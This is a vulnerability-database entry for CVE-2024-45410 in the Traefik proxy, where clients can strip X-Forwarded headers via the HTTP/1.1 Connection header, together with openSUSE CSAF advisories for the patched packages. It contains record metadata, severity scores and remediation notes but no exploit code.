Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-45410 (GCVE-0-2024-45410)
Vulnerability from cvelistv5 – Published: 2024-09-19 22:51 – Updated: 2024-09-20 14:59
VLAI?
EPSS
Summary
Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Severity ?
9.8 (Critical)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "traefik",
"vendor": "traefik",
"versions": [
{
"lessThan": "2.11.9",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "3.1.3",
"status": "affected",
"version": "3.0.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-45410",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-20T14:58:01.711908Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-20T14:59:42.914Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "traefik",
"vendor": "traefik",
"versions": [
{
"status": "affected",
"version": "\u003c 2.11.9"
},
{
"status": "affected",
"version": "\u003e= 3.0.0, \u003c 3.1.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-345",
"description": "CWE-345: Insufficient Verification of Data Authenticity",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-348",
"description": "CWE-348: Use of Less Trusted Source",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-19T22:51:02.622Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
},
{
"name": "https://github.com/traefik/traefik/releases/tag/v2.11.9",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.9"
},
{
"name": "https://github.com/traefik/traefik/releases/tag/v3.1.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/traefik/traefik/releases/tag/v3.1.3"
}
],
"source": {
"advisory": "GHSA-62c8-mh53-4cqv",
"discovery": "UNKNOWN"
},
"title": "HTTP client can remove the X-Forwarded headers in Traefik"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-45410",
"datePublished": "2024-09-19T22:51:02.622Z",
"dateReserved": "2024-08-28T20:21:32.805Z",
"dateUpdated": "2024-09-20T14:59:42.914Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"2.11.9\", \"matchCriteriaId\": \"D8862E39-A57C-4CD5-A289-A853D9402298\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\", \"versionStartIncluding\": \"3.0.0\", \"versionEndExcluding\": \"3.1.3\", \"matchCriteriaId\": \"31D16308-8F47-4EAC-B102-1FDEA4B3F9F1\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"}, {\"lang\": \"es\", \"value\": \"Traefik es un proxy de aplicaci\\u00f3n nativo de la nube (golang). Cuando Traefik procesa una solicitud HTTP, Traefik agrega ciertos encabezados HTTP como X-Forwarded-Host o X-Forwarded-Port antes de que la solicitud se env\\u00ede a la aplicaci\\u00f3n. Para un cliente HTTP, no deber\\u00eda ser posible eliminar o modificar estos encabezados. Dado que la aplicaci\\u00f3n conf\\u00eda en el valor de estos encabezados, podr\\u00edan surgir implicaciones de seguridad si se pueden modificar. Sin embargo, para HTTP/1.1, se descubri\\u00f3 que algunos de estos encabezados personalizados s\\u00ed se pueden eliminar y, en ciertos casos, manipular. El ataque se basa en el comportamiento de HTTP/1.1, que permite definir los encabezados como salto a salto a trav\\u00e9s del encabezado de conexi\\u00f3n HTTP. Este problema se ha solucionado en las versiones de lanzamiento 2.11.9 y 3.1.3. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.\"}]",
"id": "CVE-2024-45410",
"lastModified": "2024-09-25T17:39:08.033",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"baseScore\": 7.5, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 3.6}]}",
"published": "2024-09-19T23:15:11.480",
"references": "[{\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.9\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.1.3\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-345\"}, {\"lang\": \"en\", \"value\": \"CWE-348\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-345\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-45410\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-09-19T23:15:11.480\",\"lastModified\":\"2024-09-25T17:39:08.033\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"},{\"lang\":\"es\",\"value\":\"Traefik es un proxy de aplicaci\u00f3n nativo de la nube (golang). Cuando Traefik procesa una solicitud HTTP, Traefik agrega ciertos encabezados HTTP como X-Forwarded-Host o X-Forwarded-Port antes de que la solicitud se env\u00ede a la aplicaci\u00f3n. Para un cliente HTTP, no deber\u00eda ser posible eliminar o modificar estos encabezados. Dado que la aplicaci\u00f3n conf\u00eda en el valor de estos encabezados, podr\u00edan surgir implicaciones de seguridad si se pueden modificar. Sin embargo, para HTTP/1.1, se descubri\u00f3 que algunos de estos encabezados personalizados s\u00ed se pueden eliminar y, en ciertos casos, manipular. El ataque se basa en el comportamiento de HTTP/1.1, que permite definir los encabezados como salto a salto a trav\u00e9s del encabezado de conexi\u00f3n HTTP. Este problema se ha solucionado en las versiones de lanzamiento 2.11.9 y 3.1.3. Se recomienda a los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-345\"},{\"lang\":\"en\",\"value\":\"CWE-348\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-345\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.11.9\",\"matchCriteriaId\":\"D8862E39-A57C-4CD5-A289-A853D9402298\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"3.0.0\",\"versionEndExcluding\":\"3.1.3\",\"matchCriteriaId\":\"31D16308-8F47-4EAC-B102-1FDEA4B3F9F1\"}]}]}],\"references\":[{\"url\":\"https://github.com/traefik/traefik/releases/tag/v2.11.9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/releases/tag/v3.1.3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-45410\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-09-20T14:58:01.711908Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\"], \"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"2.11.9\", \"versionType\": \"custom\"}, {\"status\": \"affected\", \"version\": \"3.0.0\", \"lessThan\": \"3.1.3\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-09-20T14:59:36.474Z\"}}], \"cna\": {\"title\": \"HTTP client can remove the X-Forwarded headers in Traefik\", \"source\": {\"advisory\": \"GHSA-62c8-mh53-4cqv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"traefik\", \"product\": \"traefik\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.11.9\"}, {\"status\": \"affected\", \"version\": \"\u003e= 3.0.0, \u003c 3.1.3\"}]}], \"references\": [{\"url\": \"https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv\", \"name\": \"https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v2.11.9\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v2.11.9\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/traefik/traefik/releases/tag/v3.1.3\", \"name\": \"https://github.com/traefik/traefik/releases/tag/v3.1.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-345\", \"description\": \"CWE-345: Insufficient Verification of Data Authenticity\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-348\", \"description\": \"CWE-348: Use of Less Trusted Source\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-09-19T22:51:02.622Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-45410\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-20T14:59:42.914Z\", \"dateReserved\": \"2024-08-28T20:21:32.805Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-09-19T22:51:02.622Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
OPENSUSE-SU-2024:14365-1
Vulnerability from csaf_opensuse - Published: 2024-09-24 00:00 - Updated: 2024-09-24 00:00Summary
traefik-3.1.4-1.1 on GA media
Notes
Title of the patch
traefik-3.1.4-1.1 on GA media
Description of the patch
These are all security issues fixed in the traefik-3.1.4-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14365
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "traefik-3.1.4-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the traefik-3.1.4-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14365",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14365-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:14365-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4KJX4Q2GASBOUABCZFSMP6TGTQTP3WSM/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:14365-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/4KJX4Q2GASBOUABCZFSMP6TGTQTP3WSM/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45410 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45410/"
}
],
"title": "traefik-3.1.4-1.1 on GA media",
"tracking": {
"current_release_date": "2024-09-24T00:00:00Z",
"generator": {
"date": "2024-09-24T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14365-1",
"initial_release_date": "2024-09-24T00:00:00Z",
"revision_history": [
{
"date": "2024-09-24T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "traefik-3.1.4-1.1.aarch64",
"product": {
"name": "traefik-3.1.4-1.1.aarch64",
"product_id": "traefik-3.1.4-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik-3.1.4-1.1.ppc64le",
"product": {
"name": "traefik-3.1.4-1.1.ppc64le",
"product_id": "traefik-3.1.4-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik-3.1.4-1.1.s390x",
"product": {
"name": "traefik-3.1.4-1.1.s390x",
"product_id": "traefik-3.1.4-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik-3.1.4-1.1.x86_64",
"product": {
"name": "traefik-3.1.4-1.1.x86_64",
"product_id": "traefik-3.1.4-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik-3.1.4-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik-3.1.4-1.1.aarch64"
},
"product_reference": "traefik-3.1.4-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik-3.1.4-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik-3.1.4-1.1.ppc64le"
},
"product_reference": "traefik-3.1.4-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik-3.1.4-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik-3.1.4-1.1.s390x"
},
"product_reference": "traefik-3.1.4-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "traefik-3.1.4-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:traefik-3.1.4-1.1.x86_64"
},
"product_reference": "traefik-3.1.4-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45410",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45410"
}
],
"notes": [
{
"category": "general",
"text": "Traefik is a golang, Cloud Native Application Proxy. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise, if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated. The attack relies on the HTTP/1.1 behavior, that headers can be defined as hop-by-hop via the HTTP Connection header. This issue has been addressed in release versions 2.11.9 and 3.1.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:traefik-3.1.4-1.1.aarch64",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.ppc64le",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.s390x",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45410",
"url": "https://www.suse.com/security/cve/CVE-2024-45410"
},
{
"category": "external",
"summary": "SUSE Bug 1230842 for CVE-2024-45410",
"url": "https://bugzilla.suse.com/1230842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:traefik-3.1.4-1.1.aarch64",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.ppc64le",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.s390x",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:traefik-3.1.4-1.1.aarch64",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.ppc64le",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.s390x",
"openSUSE Tumbleweed:traefik-3.1.4-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-09-24T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2024-45410"
}
]
}
OPENSUSE-SU-2024:14367-1
Vulnerability from csaf_opensuse - Published: 2024-09-25 00:00 - Updated: 2024-09-25 00:00Summary
traefik2-2.11.10-1.1 on GA media
Notes
Title of the patch
traefik2-2.11.10-1.1 on GA media
Description of the patch
These are all security issues fixed in the traefik2-2.11.10-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14367
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "traefik2-2.11.10-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the traefik2-2.11.10-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14367",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14367-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:14367-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/O4RZJHV74UAFOBXDVVFFHC67IH6QJ2O2/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:14367-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/O4RZJHV74UAFOBXDVVFFHC67IH6QJ2O2/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45410 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45410/"
}
],
"title": "traefik2-2.11.10-1.1 on GA media",
"tracking": {
"current_release_date": "2024-09-25T00:00:00Z",
"generator": {
"date": "2024-09-25T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14367-1",
"initial_release_date": "2024-09-25T00:00:00Z",
"revision_history": [
{
"date": "2024-09-25T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "traefik2-2.11.10-1.1.aarch64",
"product": {
"name": "traefik2-2.11.10-1.1.aarch64",
"product_id": "traefik2-2.11.10-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik2-2.11.10-1.1.ppc64le",
"product": {
"name": "traefik2-2.11.10-1.1.ppc64le",
"product_id": "traefik2-2.11.10-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik2-2.11.10-1.1.s390x",
"product": {
"name": "traefik2-2.11.10-1.1.s390x",
"product_id": "traefik2-2.11.10-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "traefik2-2.11.10-1.1.x86_64",
"product": {
